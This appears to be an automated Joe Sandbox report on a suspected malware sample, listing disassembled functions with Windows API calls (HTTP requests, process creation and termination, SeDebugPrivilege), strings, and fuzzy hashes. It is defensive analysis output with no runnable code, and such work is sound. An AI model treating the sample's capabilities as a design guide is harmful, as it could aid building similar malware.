close all, xrefs: 006330D7

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 82802cb27d3ba6e2a83d26332cb099e2d4a0279a19c1022e660078fc654161c0
Instruction ID: c1c0364d85233ff717007a2d7f36cb8eab96cadc11aafb3ff247b3c4c146ed69
Opcode Fuzzy Hash: 82802cb27d3ba6e2a83d26332cb099e2d4a0279a19c1022e660078fc654161c0
Instruction Fuzzy Hash: B3913C706002128FC749EF14C895AA9F3B6FF15304F5442ADE50AAB362DF30AE56CF98

Function 0064CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0064CC15

Part of subcall function 0064CCCD: GetClientRect.USER32(?,?), ref: 0064CCF6
Part of subcall function 0064CCCD: GetWindowRect.USER32(?,?), ref: 0064CD37
Part of subcall function 0064CCCD: ScreenToClient.USER32(?,?), ref: 0064CD5F

GetDC.USER32 ref: 006AD137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006AD14A
SelectObject.GDI32(00000000,00000000), ref: 006AD158
SelectObject.GDI32(00000000,00000000), ref: 006AD16D
ReleaseDC.USER32(?,00000000), ref: 006AD175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006AD200

Strings

U, xrefs: 006AD0D5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c9e91462c02ea460327f597b87267046a00c91757fdff3413b49f2c374ec06e0
Instruction ID: f011226e1d2c76f1409954d1d99a9447780008925b1e5bd801eb2bddf38e258b
Opcode Fuzzy Hash: c9e91462c02ea460327f597b87267046a00c91757fdff3413b49f2c374ec06e0
Instruction Fuzzy Hash: 9B71AE70400205DFCF21AF64C885AEA7BB7FF4A364F144269ED569A7A6D7318C82DF60

Function 0069ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0064B34E: GetWindowLongW.USER32(?,000000EB), ref: 0064B35F

Part of subcall function 0064B63C: GetCursorPos.USER32(000000FF), ref: 0064B64F
Part of subcall function 0064B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0064B66C
Part of subcall function 0064B63C: GetAsyncKeyState.USER32(00000001), ref: 0064B691
Part of subcall function 0064B63C: GetAsyncKeyState.USER32(00000002), ref: 0064B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0069ED3C
ImageList_EndDrag.COMCTL32 ref: 0069ED42
ReleaseCapture.USER32 ref: 0069ED48
SetWindowTextW.USER32(?,00000000), ref: 0069EDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0069EE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0069EEDC

Strings

@GUI_DROPID, xrefs: 0069EE33
@GUI_DRAGFILE, xrefs: 0069EE77

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: a515951b3d4f4e429573bceda229ff563f5e1309a4643ab6af3bdb625df79b92
Instruction ID: 66f7ec99dafca8d9a5ae8e6165541d2d8c317c3bc2260bc258eb4864abc90637
Opcode Fuzzy Hash: a515951b3d4f4e429573bceda229ff563f5e1309a4643ab6af3bdb625df79b92
Instruction Fuzzy Hash: DC519B70204300AFDB10DF24DC96FAA77EAEB88714F105A2DF5959B2E1DB719944CB52

Function 006845C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006845FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0068462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0068466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00684682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0068468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006846BF
InternetCloseHandle.WININET(00000000), ref: 00684706

Part of subcall function 00685052: GetLastError.KERNEL32(?,?,006843CC,00000000,00000000,00000001), ref: 00685067

Strings

, xrefs: 006846B8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 7303804c8814406cd398c4dcfe7dbb8c706e278875c73f70bd779f102e50c565
Instruction ID: 8dbfe68838a0faf2c98f5cd87613d00d7b6411b93dd045e2e1d8e6dff27e4411
Opcode Fuzzy Hash: 7303804c8814406cd398c4dcfe7dbb8c706e278875c73f70bd779f102e50c565
Instruction Fuzzy Hash: 6F4162B1501206BFEB15AF50CC85FFB77AEFF09354F10422AFA059A141EBB09D858BA4

Function 0068B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,006CDC00), ref: 0068B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,006CDC00), ref: 0068B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0068B8C1
SysFreeString.OLEAUT32(?), ref: 0068B8EB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 3c9d42ee86bc87745c36538e5db4c234bf1cb2cebee1026ee22b012f44c38521
Instruction ID: be47651fe8836288dda7e22d947167f16c724f607de9c2af11b1961504c86158
Opcode Fuzzy Hash: 3c9d42ee86bc87745c36538e5db4c234bf1cb2cebee1026ee22b012f44c38521
Instruction Fuzzy Hash: 49F12975A00209EFCF04EF94C884EAEB7BAFF49315F109559F915AB250DB31AE42CB90

Function 006924D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006924F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00692688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006926AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006926EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0069270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0069286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006928A1
CloseHandle.KERNEL32(?), ref: 006928D0
CloseHandle.KERNEL32(?), ref: 00692947

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 785ecefd2a4c1bb9a02a1c4eff7492bdaf0e51b7437ecf694207872e70174e6b
Instruction ID: 57786843b4e94a676b699e886d4b52a2359ba72981cbb34c23a2b44d4cd307f3
Opcode Fuzzy Hash: 785ecefd2a4c1bb9a02a1c4eff7492bdaf0e51b7437ecf694207872e70174e6b
Instruction Fuzzy Hash: 89D1C071604301EFCB54EF24C4A1A6ABBEAAF85310F14855DF8899B7A2DB30DC45CB56

Function 0069B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0069B3F4

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: e64c94d3a834ea3fe93c04ef82b03a46d0e7ff500862898e06c5467d1b33d2b0
Instruction ID: 65681023fae310e186967e180aebd155831ab29b6a5988ede8a66db270e02206
Opcode Fuzzy Hash: e64c94d3a834ea3fe93c04ef82b03a46d0e7ff500862898e06c5467d1b33d2b0
Instruction Fuzzy Hash: 4651B330500204FBEF209F28EE85BAD7BAFAB05754F246115F614DAAE1D771E980DB54

Function 0064A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 006ADB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006ADB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006ADB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 006ADB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006ADB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0064A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 006ADBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006ADBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0064A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 006ADBC8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 73d526275495da36c195fcab87d5a21ad18657308853a5285e0f91d361860ad1
Instruction ID: 983d7372c2db671b1210d3a7ce50875ba8dc59a287c25fda67eaca591c8c2ca5
Opcode Fuzzy Hash: 73d526275495da36c195fcab87d5a21ad18657308853a5285e0f91d361860ad1
Instruction Fuzzy Hash: 34517BB4640209FFDB20DF68CC91FAA77FAAB19750F114628F9469B690D770AD80DB60

Function 00677555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00676EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00675FA6,?), ref: 00676ED8

Part of subcall function 00676EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00675FA6,?), ref: 00676EF1

Part of subcall function 006772CB: GetFileAttributesW.KERNEL32(?,00676019), ref: 006772CC

lstrcmpiW.KERNEL32(?,?), ref: 006775CA
_wcscmp.LIBCMT ref: 006775E2
MoveFileW.KERNEL32(?,?), ref: 006775FB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 7f9dbf54c921780b0a5974eb7b51849897a390dd01a79012a025b501f8478e41
Instruction ID: 4833dd2a3e0911122dc9bcf73f75deb63977c5134d80f35e846df3d18313733a
Opcode Fuzzy Hash: 7f9dbf54c921780b0a5974eb7b51849897a390dd01a79012a025b501f8478e41
Instruction Fuzzy Hash: 09513EB2A092199ADF90EB94D841DDE73BD9F09310F1085AEFA09E3141EA74D7C9CF64

Function 0064EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,006ADAD1,00000004,00000000,00000000), ref: 0064EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,006ADAD1,00000004,00000000,00000000), ref: 0064EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,006ADAD1,00000004,00000000,00000000), ref: 006ADC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,006ADAD1,00000004,00000000,00000000), ref: 006ADCF2

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 777f0d5a6be3ff0e5769536ccd26f42e118571cb9c38f881536ee7daa47bb859
Instruction ID: 9e4f9d224384caaddbc6387cd31f8d13368b6d3b3625504c7f7c042362b5c45b
Opcode Fuzzy Hash: 777f0d5a6be3ff0e5769536ccd26f42e118571cb9c38f881536ee7daa47bb859
Instruction Fuzzy Hash: 6E411870604680DBD7355B288F8DABA7B9BFB43314F59540DE08786B61D673BC81C711

Function 0066B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0066AEF1,00000B00,?,?), ref: 0066B26C
HeapAlloc.KERNEL32(00000000,?,0066AEF1,00000B00,?,?), ref: 0066B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0066AEF1,00000B00,?,?), ref: 0066B288
GetCurrentProcess.KERNEL32(?,00000000,?,0066AEF1,00000B00,?,?), ref: 0066B290
DuplicateHandle.KERNEL32(00000000,?,0066AEF1,00000B00,?,?), ref: 0066B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0066AEF1,00000B00,?,?), ref: 0066B2A3
GetCurrentProcess.KERNEL32(0066AEF1,00000000,?,0066AEF1,00000B00,?,?), ref: 0066B2AB
DuplicateHandle.KERNEL32(00000000,?,0066AEF1,00000B00,?,?), ref: 0066B2AE
CreateThread.KERNEL32(00000000,00000000,0066B2D4,00000000,00000000,00000000), ref: 0066B2C8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 223d89695e7cd0ac9ac3f5cdec7ec4b19f11ed7dd3e2fd1a0a1ec330b9191ecd
Instruction ID: 165efb1bd1b3c4d64002dc59229191da3abdc0b8cc2c110672fc1acd1cdb9260
Opcode Fuzzy Hash: 223d89695e7cd0ac9ac3f5cdec7ec4b19f11ed7dd3e2fd1a0a1ec330b9191ecd
Instruction Fuzzy Hash: 3B0119B5240308BFE720AFA5DC4DF6B3BADEB89710F019511FA04DF1A1DA709840CB21

Function 0068C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0068C876, 0068C887
Not an Object type, xrefs: 0068C49E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: b60d9a3b2a56f47e9aeca487aa09aeca6e041e3cc7c24e3ea361605a46bbd661
Instruction ID: bbae977c7b2e27f62681a72cfda1533a422ebbd234e113111c04dd350702cadb
Opcode Fuzzy Hash: b60d9a3b2a56f47e9aeca487aa09aeca6e041e3cc7c24e3ea361605a46bbd661
Instruction Fuzzy Hash: F7E1A7B1A00219AFDF14EFA4D845AEE77B6EF48324F14822DF905A7381D7709D41CBA4

Function 006816DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

Part of subcall function 0064C6F4: _wcscpy.LIBCMT ref: 0064C717

_wcstok.LIBCMT ref: 0068184E
_wcscpy.LIBCMT ref: 006818DD
_memset.LIBCMT ref: 00681910

Strings

X, xrefs: 00681948
p2nl2n, xrefs: 00681920

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2nl2n
API String ID: 774024439-3583928040
Opcode ID: 95c31f50544a94565c3699788426deb70004d2058fe0ec5f0440559d3900121f
Instruction ID: a0843fe864cc424402f73db55727c444123dcf9048aea8868dd78a8a94c91a21
Opcode Fuzzy Hash: 95c31f50544a94565c3699788426deb70004d2058fe0ec5f0440559d3900121f
Instruction Fuzzy Hash: 2DC180715043419FC7A4EF24C891A9AB7E6FF85350F004A6DF99A9B3A1DB30ED05CB86

Function 00699A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00699B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00699B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00699B47
_wcscat.LIBCMT ref: 00699BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00699BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00699BE7

Strings

SysListView32, xrefs: 00699AEB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: a3d9dc737d1d0085e379654a275d55fcc4fedeeaceb0f6a2cd688c256b23d05f
Instruction ID: ce4e5cc8457f4b58493847e91b8c4608f095383d88ed0a7724adcf4a5816e4e5
Opcode Fuzzy Hash: a3d9dc737d1d0085e379654a275d55fcc4fedeeaceb0f6a2cd688c256b23d05f
Instruction Fuzzy Hash: 5C41AE71900308ABEF219FA8CC85BEE77BEEF08350F10452AF949A7291D6759D85CB64

Function 0069172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00676532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00676554
Part of subcall function 00676532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00676564
Part of subcall function 00676532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 006765F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0069179A
GetLastError.KERNEL32 ref: 006917AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 006917D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00691855
GetLastError.KERNEL32(00000000), ref: 00691860
CloseHandle.KERNEL32(00000000), ref: 00691895

Strings

SeDebugPrivilege, xrefs: 006917B8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 3867f675aa75661e91aca4ed33c806a2bf6baab6fd52d670102f8eeac51fce55
Instruction ID: 20e065a3e3c94868a5c49dee96d363c4c48ed9106deebe081436e6bf653d6a85
Opcode Fuzzy Hash: 3867f675aa75661e91aca4ed33c806a2bf6baab6fd52d670102f8eeac51fce55
Instruction Fuzzy Hash: EC419DB1600202AFDB45EF54C9E5FADB7A7AF45310F14805CF9069F3D2DB74A9408B95

Function 00675819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 006758B8

Strings

warning, xrefs: 006758A1
info, xrefs: 00675859
blank, xrefs: 0067583A
question, xrefs: 00675871
stop, xrefs: 00675889

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
